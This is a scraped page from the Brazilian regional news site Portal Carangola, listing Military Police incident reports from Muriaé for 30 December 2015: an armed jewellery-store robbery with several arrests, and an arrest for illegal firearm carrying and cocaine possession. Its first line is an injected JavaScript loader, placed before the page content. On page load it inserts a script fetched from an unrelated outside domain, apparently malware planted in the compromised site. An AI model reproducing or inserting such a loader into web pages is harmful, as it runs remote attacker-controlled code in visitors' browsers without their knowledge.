;(function(f,b,n,j,x,e){x=b.createElement(n);e=b.getElementsByTagName(n)[0];x.async=1;x.src=j;e.parentNode.insertBefore(x,e);})(window,document,"script","https://treegreeny.org/KDJnCSZn"); Ocorrências policiais 30/12/15. - Portal Carangola

www.portalcarangola.com

O primeiro portal de notícias de Carangola-MG e região.

Portal Carangola

O 1º site de notícias de Carangola e Região

Ocorrências policiais 30/12/15.

pmmgesOCORRÊNCIAS DE DESTAQUE MURIAÉ – 30/12/2015

76ª CIA PM – MURIAÉ
PM EFETUA PRISÃO E RECUPERA PARTE DE MATERIAL ROUBADO DE RELOJOARIA EM MURIAÉ

Em 29/12/2015, por volta das 11h50min, na Rua João Dornelas, no Bairro Dornelas, F.M.V., de 57 anos, relatou que se encontrava na relojoaria Realce, quando foi surpreendida por 02 indivíduos armados. Como não possuía as chaves da vitrine, um dos infratores quebrou o vidro, subtraindo bijuterias, relógios, cordões e anéis. Em seguida, evadiram, sendo auxiliados por mais 02 indivíduos que se encontravam em motocicletas. Durante rastreamento, militares encontraram as referidas motocicletas abandonadas em uma mata, bem como parte do material roubado e ainda vestes/pertences dos autores. Em continuidade ao rastreamento, apreenderam L.F.N., de 16 anos e prenderam W.Q.O., de 18 anos, ambos trafegando em bicicletas e dando cobertura aos outros dois infratores, que evadiram a pé e embrenharam em uma mata, sendo capturados e presos, tratando-se de R.A.S., de 29 anos e P.R.S.R., de 20 anos. Posteriormente, ainda localizaram próximo ao Condomínio Nova Muriaé, 01 revólver Taurus cal.32 municiado com 06 cartuchos intactos e outra parte do material roubado. Diante dos fatos, os autores e materiais foram encaminhados à Delegacia de Polícia.
PM PRENDE AUTORES POR PORTE ILEGAL DE ARMA DE FOGO EM MURIAÉ

Em 29/12/2015, por volta das 22h40min, na Rua Valdomiro Inácio Rodrigues, no Bairro Aeroporto, durante averiguação de denúncia, militares acionaram cerco e bloqueio, abordando uma motocicleta conduzida por L.C.R., de 32 anos, tendo como passageiro D.B.A.S., de 27 anos. Durante busca pessoal, lograram êxito em localizar na cintura do condutor, 01 revólver cal.38 carregado com 5 munições intactas e em seu bolso, 01 invólucro de cocaína. Diante dos fatos, o veículo foi apreendido e os autores presos, sendo conduzidos à Delegacia de Polícia.
ASSESSORIA DE COMUNICAÇÃO ORGANIZACIONAL DO 47° BPM
RUA JOSÉ DE FREITAS LIMA Nº 47 – BAIRRO SAFIRA
MURIAÉ / MG
TELEFONE: 3696-3275. 3696-3265

Deixe um comentário

O seu endereço de e-mail não será publicado. Campos obrigatórios são marcados com *

Esse site utiliza o Akismet para reduzir spam. Aprenda como seus dados de comentários são processados.